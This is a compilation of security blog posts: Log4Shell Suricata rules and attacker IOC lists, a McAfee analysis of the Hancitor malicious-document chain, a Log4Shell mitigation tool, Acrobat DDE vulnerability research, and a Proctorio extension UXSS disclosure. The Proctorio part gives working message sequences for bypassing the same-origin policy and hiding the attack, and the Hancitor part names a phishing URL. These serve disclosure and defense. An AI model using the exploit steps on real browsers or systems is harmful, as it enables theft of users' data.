alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JNDI LDAP Bind to External Observed (CVE-2021-44228)"; flow:established, to_server; dsize:14; content:"|02 01 03 04 00 80 00|"; offset:7; isdataat:!1, relative; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; metadata:created_at 2021-12-11; sid:21003738; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JRMI Request to External Observed (CVE-2021-44228)"; flow:established, to_server; content:"JRMI"; depth:4; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; reference:url, https://docs.oracle.com/javase/9/docs/specs/rmi/protocol.html; metadata:created_at 2021-12-11; sid:21003739; rev:1;)
# Detecting inbound java shortly after exploitation attempt
alert tcp any any -> $HOME_NET any (msg: "FOX-SRT – Exploit – Java class inbound after CVE-2021-44228 exploit attempt (xbit)"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:40; fast_pattern; xbits:isset, fox.log4shell.attempt, track ip_dst; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:successful-user; priority:1; metadata:ids suricata; metadata:created_at 2021-12-12; sid:21003741; rev:1;)

Hunting rules (can yield false positives)

Wget and cURL to external hosts were observed being used by an actor for post-exploitation. As cURL and Wget are also used legitimately, these rules should be used for hunting purposes. Also note that attackers can easily change the User-Agent, but we have not seen that in the wild yet. Outgoing connections after Log4j exploitation attempts can be tracked for later hunting, although this rule can generate false positives if the victim machine makes outgoing connections regularly. Lastly, detecting inbound compiled Java classes can also be used for hunting.

# Outgoing connection after Log4j Exploit Attempt (uses xbit from sid: 21003734) – requires `stream.inline=yes` setting in suricata.yaml for this to work
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Suspicious – Possible outgoing connection after Log4j Exploit Attempt"; flow:established, to_server; xbits:isset, fox.log4shell.attempt, track ip_src; stream_size:client, =, 1; stream_size:server, =, 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:bad-unknown; metadata:ids suricata; metadata:created_at 2021-12-12; priority:3; sid:21003740; rev:1;)
# Detects inbound Java class
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "FOX-SRT – Suspicious – Java class inbound"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:20; fast_pattern; threshold:type limit, track by_dst, count 1, seconds 43200; metadata:ids suricata; metadata:created_at 2021-12-12; classtype:bad-unknown; priority:3; sid:21003742; rev:2;)

Indicators of Compromise

This list contains domains and IPs that have been observed to listen for incoming connections. Unfortunately, some adversaries scan and listen from the same IP, generating a lot of noise that can make threat hunting more difficult. Moreover, as security researchers are scanning the internet for the vulnerability as well, it is possible that an IP or domain is listed here even though it is only listening for benign purposes.

# IP addresses and domains that have been observed in Log4j exploit attempts
134[.]209[.]26[.]39
199[.]217[.]117[.]92
pwn[.]af
188[.]120[.]246[.]215
kryptoslogic-cve-2021-44228[.]com
nijat[.]space
45[.]33[.]47[.]240
31[.]6[.]19[.]41
205[.]185[.]115[.]217
log4j[.]kingudo[.]de
101[.]43[.]40[.]206
psc4fuel[.]com
185[.]162[.]251[.]208
137[.]184[.]61[.]190
162[.]33[.]177[.]73
34[.]125[.]76[.]237
162[.]255[.]202[.]246
5[.]22[.]208[.]77
45[.]155[.]205[.]233
165[.]22[.]213[.]147
172[.]111[.]48[.]30
133[.]130[.]120[.]176
213[.]156[.]18[.]247
m3[.]wtf
poc[.]brzozowski[.]io
206[.]188[.]196[.]219
185[.]250[.]148[.]157
132[.]226[.]170[.]154
flofire[.]de
45[.]130[.]229[.]168
c19s[.]net
194[.]195[.]118[.]221
awsdns-2[.]org
2[.]56[.]57[.]208
158[.]69[.]204[.]95
163[.]172[.]157[.]143
45[.]137[.]21[.]9
bingsearchlib[.]com
45[.]83[.]193[.]150
165[.]227[.]93[.]231
yourdns[.]zone[.]here
eg0[.]ru
dataastatistics[.]com
log4j-test[.]xyz
79[.]172[.]214[.]11
152[.]89[.]239[.]12
67[.]205[.]191[.]102
ds[.]Rce[.]ee
38[.]143[.]9[.]76
31[.]191[.]84[.]199
143[.]198[.]237[.]19

# (Ab)use of listener-as-a-service domains.
# These domains can be false positive heavy, especially if these services are used legitimately within your network.
interactsh[.]com
interact[.]sh
burpcollaborator[.]net
requestbin[.]net
dnslog[.]cn
canarytokens[.]com

# These IPs are both listeners and scanners at the same time. Threat hunting for these IOCs thus requires additional steps.
45[.]155[.]205[.]233
194[.]151[.]29[.]154
158[.]69[.]204[.]95
47[.]254[.]127[.]78


HANCITOR DOC drops via CLIPBOARD

13 December 2021 at 14:32

By Sriram P & Lakshya Mathur 

Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more. Recently at McAfee Labs, we observed Hancitor Doc VBA (Visual Basic for Applications) samples dropping the payload using the Windows clipboard through Selection.Copy method. 

This blog focuses on the effectiveness of this newly observed technique and how it adds an extra layer of obfuscation to evade detection. 

Below (Figure 1) is the Geolocation based stats of Hancitor Malicious Doc observed by McAfee since September 2021 

Figure 1 – Geo stats of Hancitor MalDoc

INFECTION CHAIN

  1. The victim will receive a Docusign-based phishing email.
  2. On clicking on the link (hxxp://mettlybothe.com/8/forum[.]php), a Word Document file is downloaded.
  3. On enabling the macro content in Microsoft Word, the macro drops an embedded OLE object (a password-protected, macro-infected Document file) and launches it.
  4. This second Document file drops the main Hancitor DLL (Dynamic Link Library) payload.
  5. The DLL payload is then executed via rundll32.exe.
Figure 2 – Infection Chain

TECHNICAL ANALYSIS

Malware authors send the victims a phishing email containing a link as shown in the below screenshot (Figure 3). The usual Docusign theme is used in this recent Hancitor wave. This phishing email contains a link to the original malicious word document. On clicking the link, the Malicious Doc file is downloaded.

Figure 3 – Phishing mail pretending to be DocuSign

Since macros are disabled in the default configuration, malware authors try to lure victims into believing that the file is from a legitimate organization or individual and ask victims to enable editing and content to start the execution of the macros. The screenshot below (Figure 4) is the lure technique that was observed in this current wave.

Figure 4 – Document Face

As soon as the victim enables editing, malicious macros are executed via the Document_Open function.

There is an OLE object embedded in the Doc file. The screenshot below (Figure 5) highlights the object as an icon.

Figure 5 – OLE embedded object marked inside the red circle

The loader VBA function, invoked by document_open, calls a randomly named function (Figure 6), which moves the selection cursor to the exact location of the OLE object using the selection methods (.MoveDown, .MoveRight, .MoveTypeBackspace). Using the Selection.Copy method, it copies the selected OLE object to the clipboard. Once it is copied to the clipboard it is dropped under the %temp% folder.

Figure 6 – VBA Function to Copy content to Clipboard

When an embedded object is being copied to the clipboard, it gets written to the temp directory as a file. This method is used by the malware author to drop a malicious word document instead of explicitly writing the file to disk using macro functions like the classic FileSystemObject.

In this case, the file was saved to the %temp% location with the filename “zoro.kl” as shown in the below screenshot (Figure 8). Figure 7 shows the corresponding ProcMon log involving the file write event.

Figure 7 – ProcMon log for the creation and WriteFile of “zoro.kl” in %temp% folder
Figure 8 – “zoro.kl” in %temp% location

Using the CreateObject(“Scripting.FileSystemObject”) method, the malware moves the file to a new location \Appdata\Roaming\Microsoft\Templates and renames it to “zoro.doc”.

Figure 9 – VBA Function to rename and move the dropped Doc file

This file is then opened with the built-in document method, Documents.Open. This moved file, zoro.doc, is password-protected. In this case, the password used was “doyouknowthatthegodsofdeathonlyeatapples?”. We have also seen the usage of passwords like “donttouchme”, etc.

Figure 10 – VBA Function to password protect the Doc file

This newly dropped doc is executed using the Documents.Open function (Figure 11).

Figure 11 – VBA methods present inside “zoro.doc”

Zoro.doc uses the same techniques to copy and drop the next payload as we saw earlier. The only difference is that it has a DLL as the embedded OLE object.

It drops the file in the %temp% folder using clipboard with the name “gelforr.dap”. Again, it moves gelforr.dap DLL file to \Appdata\Roaming\Microsoft\Templates (Figure 12).

Figure 12 – Files dropped under the \Appdata\Roaming\Microsoft\Template folder

Finally, after moving DLL to the templates folder, it is executed using Rundll32.exe by another VBA call.

MITRE ATT&CK

Technique ID | Tactic | Technique details
T1566.002 | Initial Access | Spam mail with links
T1204.001 | Execution | User Execution by opening the link
T1204.002 | Execution | Executing downloaded doc
T1218 | Defense Evasion | Signed Binary Execution Rundll32
T1071 | C&C (Command & Control) | HTTP (Hypertext Transfer Protocol) protocol for communication

 

IOC (Indicators Of Compromise)

Type | SHA-256 / URL | Scanner Detection Name
Main Doc | 915ea807cdf10ea4a4912377d7c688a527d0e91c7777d811b171d2960b75c65c | WSS W97M/Dropper.im
Dropped Doc | c1c89e5eef403532b5330710c9fe1348ebd055d0fe4e3ebbe9821555e36d408e | WSS W97M/Dropper.im
Dropped DLL | d83fbc9534957dd464cbc7cd2797d3041bd0d1a72b213b1ab7bccaec34359dbb | WSS RDN/Hancitor
URL (Uniform Resource Locator) | hxxp://mettlybothe.com/8/forum[.]php | WebAdvisor Blocked

 


log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228

14 December 2021 at 07:11

tl;dr Run our new tool by adding -javaagent:log4j-jndi-be-gone-1.0.0-standalone.jar to all of your JVM Java stuff to stop log4j from loading classes remotely over LDAP. This will prevent malicious inputs from triggering the “Log4Shell” vulnerability and gaining remote code execution on your systems.

In this post, we first offer some context on the vulnerability, the released fixes (and their shortcomings), and finally our mitigation (or you can skip directly to our mitigation tool here).

Context: log4shell

Hello internet, it’s been a rough week. As you have probably learned, basically every Java app in the world uses a library called “log4j” to handle logging, and any string passed into those logging calls will evaluate magic ${jndi:ldap://...} sequences to remotely load (malicious) Java class files over the internet (CVE-2021-44228, “Log4Shell”).

Right now, while the SREs are trying to apply the not-quite-a-fix official fix and/or implement egress filtering without knocking their employers off the internet, most people are either blaming log4j for even having this JNDI stuff in the first place and/or blaming the issue on a lack of support for the project that would have helped to prevent such a dangerous behavior from being so accessible. In reality, the JNDI stuff is regrettably more of an “enterprise” feature than one that developers would just randomly put in if left to their own devices. Enterprise Java is all about antipatterns that invoke code in roundabout ways to the point of obfuscation, and supporting ever more dynamic ways to integrate weird protocols like RMI to load and invoke remote code dynamically in weird ways. Even the log4j format “Interpolator” wraps a bunch of handlers, including the JNDI handler, in reflection wrappers. So, if anything, more “(financial) support” for the project would probably just lead to more of these kinds of things happening as demand for one-off formatters for new systems grows among larger users. Welcome to Enterprise Java Land, where they’ve already added log4j variable expansion for Docker and Kubernetes.

Alas, the real problem is that log4j 2.x (the version basically everyone uses) is designed in such a way that all string arguments after the main format string for the logging call are also treated as format strings. Basically all log4j calls are equivalent to if the following C:

printf("%s\n", "clobbering some bytes %n");

were implemented as the very unsafe code below:

char *buf;
asprintf(&buf, "%s\n", "clobbering some bytes %n");
printf(buf);

Basically, log4j never got the memo about format string vulnerabilities and now it’s (probably) too late. It was only a matter of time until someone realized they exposed a magic format string directive that led to code execution (and even without the classloading part, it is still a means of leaking expanded variables out through other JNDI-compatible services, like DNS), and I think it may only be a matter of time until another dangerous format string handler gets introduced into log4j. Meanwhile, even without JNDI, if someone has access to your log4j output (wherever you send it), and can cause their input to end up in a log4j call (pretty much a given based on the current havoc playing out) they can systematically dump all sorts of process and system state into it including sensitive application secrets and credentials. Had log4j not implemented their formatting this way, then the JNDI issue would only impact applications that concatenated user input into the format string (a non-zero amount, but much less than 100%).

The “Fixes”

The main fix is to update to the just released log4j 2.16.0. Prior to that, the official mitigation from the log4j maintainers was:

“In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.”

Apache Log4j

So to be clear, the fix given for older versions of log4j (2.0-beta9 until 2.10.0) is to find and purge the JNDI handling class from all of your JARs, which are probably all-in-one fat JARs because no one uses classpaths anymore, all to prevent it from being loaded.

A tool to mitigate Log4Shell by disabling log4j JNDI

To try to make the situation a little bit more manageable in the meantime, we are releasing log4j-jndi-be-gone, a dead simple Java agent that disables the log4j JNDI handler outright. log4j-jndi-be-gone uses the Byte Buddy bytecode manipulation library to modify the at-issue log4j class’s method code and short circuit the JNDI interpolation handler. It works by effectively hooking the at-issue JndiLookup class’ lookup() method that Log4Shell exploits to load remote code, and forces it to stop early without actually loading the Log4Shell payload URL. It also supports Java 6 through 17, covering older versions of log4j that support Java 6 (2.0-2.3) and 7 (2.4-2.12.1), and works on read-only filesystems (once installed or mounted) such as in read-only containers.

The benefit of this Java agent is that a single command line flag can negate the vulnerability regardless of which version of log4j is in use, so long as it isn’t obfuscated (e.g. with proguard), in which case you may not be in a good position to update it anyway. log4j-jndi-be-gone is not a replacement for the -Dlog4j2.formatMsgNoLookups=true system property in supported versions, but helps to deal with those older versions that don’t support it.

Using it is pretty simple, just add -javaagent:path/to/log4j-jndi-be-gone-1.0.0-standalone.jar to your Java commands. In addition to disabling the JNDI handling, it also prints a message indicating that a log4j JNDI attempt was made with a simple sanitization applied to the URL string to prevent it from becoming a propagation vector. It also “resolves” any JNDI format strings to "(log4j jndi disabled)" making the attempts a bit more grep-able.

$ java -javaagent:log4j-jndi-be-gone-1.0.0.jar -jar myapp.jar

log4j-jndi-be-gone is available from our GitHub repo, https://github.com/nccgroup/log4j-jndi-be-gone. You can grab a pre-compiled log4j-jndi-be-gone agent JAR from the releases page, or build one yourself with ./gradlew, assuming you have a recent version of Java installed.

Exploring Acrobat’s DDE attack surface

14 December 2021 at 12:13

Introduction

 

Adobe Acrobat has been our favorite target to poke at for bugs lately, knowing that it's one of the most popular and most versatile PDF readers available. In our previous research, we've been hammering Adobe Acrobat's JavaScript APIs by writing dharma grammars and testing them against Acrobat. As we continued investigating those APIs, we decided as a change of scenery to look into other features Adobe Acrobat provides. Even though it has a rich attack surface, we had to find which parts would be a good place to start looking for bugs.

While looking at the broker functions, we noticed that there’s a function that’s accessible through the renderer that triggers DDE calls. That by itself was a reason for us to start looking into the DDE component of Acrobat.

In this blog we'll dive into some of Adobe Acrobat's attack surface, starting with DDE in Acrobat through Adobe IAC.


DDE in Acrobat

To understand how DDE works let's first introduce the concept of inter-process communication (IPC).

So, what is IPC? It's a mechanism, provided by the operating system, for processes to communicate with each other. It could be that one process informs another about an event that has occurred, or it could be managing shared data between processes. In order for these processes to understand each other they have to agree on a certain communication approach/protocol. There are several IPC mechanisms supported by Windows, such as mailslots, pipes, DDE, etc.

In Adobe Acrobat DDE is supported through Acrobat IAC which we will discuss later in this blog.


What is DDE?

In short, DDE stands for Dynamic Data Exchange, which is a message-based protocol used for sending messages and transferring data from one process to another using shared memory.

In each inter-process communication with DDE, a client and a server engage in a conversation.

A DDE conversation is established using uniquely defined strings as follows:

  • Service name: a unique string defined by the application that implements the DDE server which will be used by both DDE Client and DDE server to initialize the communication.

  • Topic name: is a string that identifies a logical data context.

  • Item name: is a string that identifies a unit of data a server can pass to a client during a transaction.

 

DDE shares these strings by using its Global Atom Table. The DDE protocol also defines how applications should use the wParam and lParam parameters to pass larger data pieces through shared memory handles and global atoms.


When is DDE used?

 

It is most appropriate for data exchanges that do not require ongoing user interaction. An application using DDE provides a way for the user to exchange data between the two applications. However, once the transfer is established, the applications continue to exchange data without further user intervention as in socket communication.

The ability to use DDE in an application running on Windows can be added through DDEML.


Introducing DDEML

The Dynamic Data Exchange Management Library (DDEML) provided by Windows makes it easier to add DDE support to an application by offering an interface that simplifies managing DDE conversations. Instead of sending, posting, and processing DDE messages directly, an application can use the DDEML functions to manage DDE conversations.

So, usually the following steps happen when a DDE client wants to start a conversation with the server:

 

  1. Initialization

Before calling any DDE functions we need to register our application with DDEML and specify the transaction filter flags for the callback function. The following functions are used for the initialization part:

  •  DdeInitializeW()

  • DdeInitializeA()

 

    Note: "A" used to indicate "ANSI" A Unicode version with the letter "W" used to indicate "wide"

   

2. Establishing a Connection

In order to connect our client to a DDE Server we must use the Service and Topic names associated with the application. The following function will return a handle to our connection which will be used later for data transactions and connection termination:

  • DdeConnect()

 

3. Data Transaction

In order to send data from DDE client to DDE server we need to call the following function:

  • DdeClientTransaction()


4. Connection Termination

DDEML provides a function for terminating any DDE conversations and freeing any DDEML resources related:

  • DdeUninitialize()

Acrobat IAC

As we discussed before about Acrobat, Inter Application Communication (IAC) allows an external application to control and manipulate a PDF file inside Adobe Acrobat using several methods such as OLE and DDE.

For example, let's say you want to merge two PDF documents into one and save that document with a different name, what do we need to achieve that ?

  1. Obviously we need Adobe Acrobat DC Pro.

  2. The service and topic names for Acrobat.

    • Topic name is "Control"

    • Service Name:

      • AcroViewA21" here "A" means Acrobat and "21" refer to the version.

      • "AcroViewR21" here "R" for Reader.


    So, to retrieve the service name for your installation based on the product and the version you can check the registry key:

What is the item we are going to use ?

When we attempt to send a DDE command to the server implemented in acrobat the item will be NULL.

Adobe Acrobat Reader DC supports several DDE messages, but some of these messages require Adobe Acrobat DC Pro in order to work.

The format of the message should be between brackets and it's case sensitive. e.g:

  • Displaying document: such as "[FileOpen()]" and "[DocOpen()]".

  • Saving and printing documents: such as "[DocSave()]" and "[DocPrint()]".

  • Searching document: such as "[DocFind()]".

  • Manipulating document such as: "[DocInsertPage()]" and "[DocDeletePages()]".


    Note that in order to use Adobe Acrobat DDE messages that start with Doc, the file must be opened using the [DocOpen()] message.

We started by defining the Service and Topic names for Adobe Acrobat and the DDE messages we want to send. In our case, we want to merge two documents into one, so we need three DDE methods: "[DocOpen()]", "[DocInsertPages()]" and "[DocSaveAs()]".


Next, as we discussed before, we first need to register our application with DDEML using DdeInitialize().

After the initialization step we have to connect to the DDE server using the Service and Topic names that we defined earlier, by calling DdeConnect().

Now we need to send our message using DdeClientTransaction(). We use XTYPE_EXECUTE with a NULL item, and our command is stored in an HDDEDATA handle created by calling DdeCreateDataHandle(). After executing this part of the code, Adobe Acrobat will open the PDF document, append the other document to it, save the result as a new file and then exit.

The last part is closing the connection and cleaning up the opened handles. All of these steps are shown in the sketch below.
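For such a merge, a minimal self-contained sketch of the whole client sequence could look like the following. This is an illustrative reconstruction, not our exact code: it assumes Acrobat DC Pro with service name "AcroViewA21" and topic "Control", the file paths are placeholders, and the precise argument layout of the IAC commands should be checked against Adobe's IAC reference.

#include <windows.h>
#include <ddeml.h>

// DDEML requires a callback even for a pure client; we ignore all transactions.
HDDEDATA CALLBACK DdeCallback(UINT, UINT, HCONV, HSZ, HSZ, HDDEDATA, ULONG_PTR, ULONG_PTR)
{
    return NULL;
}

int main()
{
    DWORD idInst = 0;

    // 1. Initialization: register this application with DDEML as a client only.
    if (DdeInitializeA(&idInst, (PFNCALLBACK)DdeCallback, APPCMD_CLIENTONLY, 0) != DMLERR_NO_ERROR)
        return 1;

    // 2. Establishing a connection using the Acrobat service and topic names.
    HSZ hszService = DdeCreateStringHandleA(idInst, "AcroViewA21", CP_WINANSI);
    HSZ hszTopic = DdeCreateStringHandleA(idInst, "Control", CP_WINANSI);
    HCONV hConv = DdeConnect(idInst, hszService, hszTopic, NULL);
    if (!hConv) { DdeUninitialize(idInst); return 1; }

    // 3. Data transaction: XTYPE_EXECUTE with a NULL item name. The command string
    //    (placeholder paths, simplified arguments) opens a.pdf, inserts b.pdf and saves the result.
    const char cmd[] =
        "[DocOpen(\"C:\\test\\a.pdf\")]"
        "[DocInsertPages(\"C:\\test\\a.pdf\",\"C:\\test\\b.pdf\",-1)]"
        "[DocSaveAs(\"C:\\test\\a.pdf\",\"C:\\test\\merged.pdf\")]";
    HDDEDATA hData = DdeCreateDataHandle(idInst, (LPBYTE)cmd, sizeof(cmd), 0, NULL, CF_TEXT, 0);
    DdeClientTransaction((LPBYTE)hData, (DWORD)-1, hConv, NULL, CF_TEXT, XTYPE_EXECUTE, 10000, NULL);

    // 4. Connection termination: free the handles and unregister from DDEML.
    DdeDisconnect(hConv);
    DdeFreeStringHandle(idInst, hszService);
    DdeFreeStringHandle(idInst, hszTopic);
    DdeUninitialize(idInst);
    return 0;
}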

So we decided to take a look at Adobe plug-ins to see who else implements a DDE server, by searching for DdeInitialize() calls:

Great 😈 it seems we got five plug-ins that implement a DDE service. Before analyzing these plug-ins we went searching for more info about them and found that the search and catalog plug-ins are documented by Adobe... good, what next!

 

Search Plug-in

We started to read about the search plug-in and we summarized it in the following:

Acrobat has a feature which allows the user to search for text inside a PDF document. But we already mentioned a DDE method called DocFind(), right? Well, DocFind() searches the PDF document page by page, while the search plug-in performs an indexed search that allows searching for a word in the form of a query; in other words, we can search a cataloged PDF 🙂.

So basically the search plug-in allows the client to send search queries and manipulate indexes.

When implementing a client that communicates with the search plug-in, the service name and topic name will be "Acrobat Search" instead of "Acroview".

 

Remember that when we sent a DDE request to Adobe Acrobat the item was NULL, but in the search plug-in there are two types of items the client can use to submit query data and one item for manipulating the index:

 

  • SimpleQuery item: Allows the user to send a query that supports Boolean operations, e.g. if we want to search for any occurrence of the word "bye" or "hello" we can send "bye OR hello".

  • Query item: Allows different kinds of search queries and lets us specify the parser handling the query.

 

The item name used to manipulate indexes is "Index", and the DDE transaction type will be XTYPE_POKE, which is a single poke transaction.

So, we started by manipulating indexes. When we attempt to do an operation on indexes the data must be in the following form:

Where eAction represents the action to be made on the index:

  • Adding index

  • Deleting index

  • Enabling or Disabling index on the shelf.

 

The cbData[0] field will store the index file path we want to act on, for example "C:\\XD\\test.pdx"; a PDX file is an index file that is created from one or multiple IDX files.


CVE-2021-39860

So, we started analyzing the function responsible for handling the structure data sent by the client, and it turned out there are no checks on the data sent.

As we can see, after calling DdeAccessData() the EAX register will store a pointer to our data, and the code accesses whatever data is at offset 4. So if we want to trigger an access violation at "movsx eax,word ptr [ecx+4]" we simply send a two-byte string, which results in an Out-Of-Bounds Read 🙂 as demonstrated in the following crash:

 

Catalog Plug-in

Acrobat DC has a feature that allows the user to create a full-text index file for one or multiple PDF documents that will be searchable using the search command. The file extension is PDX. It will store the text of all specified PDF documents.

Catalog Plug-in support several DDE methods such as:

  • [FileOpen(full path)] : Used to open an index file and display the edit index dialog box, the file name must end with PDX extension.

  • [FilePurge(full path)]:  Used to purge index definition file. The file name also must end with PDX extension.

 

The Topic name for Catalog is "Control" and the service name according to the Adobe documentation is "Acrobat"; however, if we check the registry key belonging to Adobe Catalog we can see that it is "Acrocat" (meoww) instead of "Acrobat".

Using IDA Pro we can see the DDE methods that the catalog plug-in supports, along with the Service and Topic names:

 

CVE-2021-39861 

Since there are several DDE methods that we can send to the catalog plug-in, and these DDE methods accept one argument (except for the "App"-related methods) which is a path to a file, we started analyzing the function responsible for handling this argument and it turned out 🙂:

 

The function will check the start of the string (the supplied argument) for \xFE\xFF; if it's there it calls the Bug() function, which reads the string as a Unicode string, otherwise it calls sub_22007210(), which reads the string as an ANSI string.

So, if we can send "\xFE\xFF" (a byte order mark) at the start of an ASCII string, then we will probably end up with an Out-of-Bounds Read, since the code will look for a Unicode NULL terminator ("\x00\x00") instead of an ASCII NULL terminator.
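To illustrate the mismatch, here is a small standalone sketch (hypothetical buffer and helper, not Acrobat's code) of how a scan for a two-byte terminator walks right past the single-byte terminator of an ASCII string:

#include <cstdint>
#include <cstdio>
#include <cstring>

// Counts UTF-16 code units until a two-byte NUL, the way a wide-string length
// routine would; a lone 0x00 byte does not stop it.
static size_t wide_length(const uint8_t *p)
{
    size_t n = 0;
    while (p[2 * n] != 0 || p[2 * n + 1] != 0)
        ++n;
    return n;
}

int main()
{
    // 32 bytes standing in for the string allocation plus whatever happens to
    // follow it in memory (non-zero filler, with a 0x00 0x00 pair only much later).
    uint8_t region[32];
    memset(region, 0x41, sizeof(region));
    region[30] = 0;
    region[31] = 0;

    // "\xFE\xFF" prefix followed by plain ASCII and a single NUL terminator.
    const uint8_t str[] = { 0xFE, 0xFF, 'A', 'B', 'C', 0x00 };
    memcpy(region, str, sizeof(str));

    printf("ASCII length after the prefix: %zu bytes\n", strlen((const char *)region + 2));
    printf("UTF-16 scan covered %zu code units before hitting 0x00 0x00\n", wide_length(region));
    return 0;
}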

We can see here the function handling Unicode string :

 

And 😎:

Here we can see a snippet of the POC:

 

That’s it for today. Stay tuned for more new attack surfaces blogs!

Happy Hunting!

References

Proctorio Chrome extension Universal Cross-Site Scripting

14 December 2021 at 00:00

The switch to online exams

In February of 2020 the first person in The Netherlands tested positive for COVID-19, which quickly led to a national lockdown. After that universities had to close for physical lectures. This meant that universities quickly had to switch to both online lectures and tests.

For universities this posed a problem: how are you going to prevent students from cheating if they take the test in a location where you have no control nor visibility? In The Netherlands most universities quickly adopted anti-cheating software that students were required to install in order to be able to take a test. This to the dissatisfaction of students, who found this software to be too invasive of their privacy. Students were required to run monitoring software on their personal device that would monitor their behaviour via the webcam and screen recording.

The usage of this software was covered by national media on a regular basis, as students fought to disallow universities from using this kind of software. This led to several court cases where universities had to defend the usage of this software. The judge ended up ruling in favour of the universities.

Proctorio is such monitoring software and it is used by most Dutch universities. For students this comes as a Google Chrome extension. And indeed, the extension has quite an extensive list of permissions. This includes the recording of your screen and permission to read and change all data on the websites that you visit.

All this was reason enough for us to have a closer look to this much debated software. After all, vulnerabilities in this extension could have considerable privacy implications for students with this extension installed. In the end, we found a severe vulnerability that leads to a Universal Cross-Site Scripting vulnerability, which could be triggered by any website. This means that a malicious website visited by the user could steal or modify any data from every website, if the victim had the Proctorio extension installed. The vulnerability has since been fixed by Proctorio. As Chrome extensions are updated automatically, this requires no actions from Proctorio users.

Background

Chrome extensions consist of two parts. A background page with JavaScript is the core of the extension, which has the permissions granted to the extension. It can add scripts to currently open tabs, which are known as content scripts. Content scripts have access to the DOM, but use a separate JavaScript environment. Content scripts do not have the full permissions of the background page, but their ability to communicate with the background page makes them more powerful than the JavaScript on a page itself.

Vulnerability details

The Proctorio extension inspects network traffic of the browser. When requests are observed for paths that match supported test taking websites, it injects some content scripts into the page. It tries to determine if the user is using a Proctorio-enabled test by retrieving details of the test using specific API endpoints used by the supported test websites.

Once a test is started, a toolbar is added with a number of buttons allowing a student to manage Proctorio. This includes a button to open a calculator, which supports some simple mathematical calculations.

Proctorio Calculator

When the user clicks the ‘=’ button, a function is called in the content script to compute the result. The computation is performed by calling the eval() function in JavaScript; in the minified JavaScript this happens in the function named ghij. The function eval() is dangerous, as it can execute arbitrary JavaScript, not just mathematical expressions. The function ghij does not check that the input is actually a mathematical expression.

Because the calculator is added to the DOM of the page activating Proctorio, JavaScript on the page can automatically enter an expression for the calculator and then trigger the evaluation. This allows the webpage to execute code inside the content script. From the context of the content script, the page can then send messages to the background page that are handled as messages from the content script. Using a combination of messages, we found we could trigger UXSS.

(In our Zoom exploit, the calculator was opened just to demonstrate our ability to launch arbitrary applications, but in this case we actually exploit the calculator itself!)

Exploitation to UXSS

By using one of a number of specific paths in the URL, adding certain DOM elements and sending specific responses to a small number of API requests Proctorio can be activated by any website without user approval. By pretending to be in demo mode and automatically activating the demo, the page can start a complete Proctorio session. This happens completely automatically, without user interaction. Then, the page can open the calculator and use the exploit to execute code in the content script.

The content script itself does not have the full permissions of the browser extension, but it does have permission to send messages to the background page. The JavaScript on the background page supports a large number of different messages, each identified by a number in the first element of the array that makes up the message.

The first thing that can be done using that is to download a URL while bypassing the Same Origin Policy. There are a number of different message types that will download a URL and return the result. For example, message number 502:

chrome.runtime.sendMessage([502, '1', '2', 'https://www.google.com/#'], alert);

(The # is used here to make sure anything which is appended after it is not sent to the server.)

This downloads the URL in the session of the current user and returns the result to the page. This could be used to, for example, retrieve all of the user’s email messages if they are signed in to their webmail if it uses cookies for authentication. Normally, this is not allowed unless the URL uses the same origin, or the response specifically allows it using Cross-Origin Resource Sharing (CORS).

A CORS bypass is already a serious vulnerability, but it can be extended further. A universal cross-site scripting attack can be performed in the following way.

Some messages trigger the adding of new content scripts to the tab. Sometimes, variables need to be passed to those scripts. Most of the time those variables are escaped correctly, but when using a message with number 25, the argument is not escaped. The minified code for this function is:

if (25 == a[0]) return chrome.tabs.executeScript(b.tab.id, {
    code: c0693(a[1])
}, function() {}), c({}), !0;

which calls:

function c0693(a) {
    return "(" + function(a) {
        var b = document.getElementsByTagName("body");
        if (b.length) b[0].innerHTML = a; else {
            b = document.getElementsByTagName("html")[0];
            var c = document.createElement("body");
            c.innerHTML = a;
            b.appendChild(c);
        }
    } + ")(" + a + ");";
}

This function c0693() contains a function which is converted to a string. This inner function is not executed by the background page; converting it to a string takes the text of the function, which is then called using the argument a in the content script. Note that the last line in this function does not escape that value. This means that it is possible to include JavaScript, which is then executed in the context of the content script in the same tab that sent the message.

Evaluating JavaScript in the same tab again is not very useful on its own, but it is possible to make the tab switch origins in between sending the message and the execution of the new script. This is because the call to executeScript specifies the tab id, which doesn’t change when navigating to a different page.

Message with number 507 uses a synchronous XMLHttpRequest, which means that the JavaScript of the entire background page will be blocked while waiting for the HTTP response. By sending a request to a URL which is set up to always take 5 seconds to respond, then immediately sending a message with number 25 and then changing the location of the tab, the JavaScript from the 25 message is executed on a new page instead.

For example, the following will allow the https://computest.nl origin to execute an alert on the https://example.com origin:

chrome.runtime.sendMessage([507, '1', '2', 'https://computest.nl/sleep#']);

chrome.runtime.sendMessage([25, 'alert(document.domain)']);

document.location = 'https://example.com';

The URL https://computest.nl/sleep is used here as an example of a URL that takes 5 seconds to respond.

The video below demonstrates the attack:

Finally, the user could notice the fact that Proctorio is enabled based on the color of the Proctorio icon in the browser bar, which turns green once it activates. However, sending a message [32, false] turns this icon grey again, even though Proctorio is still active. The malicious webpage could quickly turn the icon grey again after exploiting the content script, which means the user only has a few milliseconds to notice the attack.

What can we do with UXSS?

An important security mechanism of your browser is called the Same Origin Policy (SOP). Without SOP surfing the web would be very insecure, as websites would then be able to read data from other domains (origins). It is the most important security control the browser has to enforce.

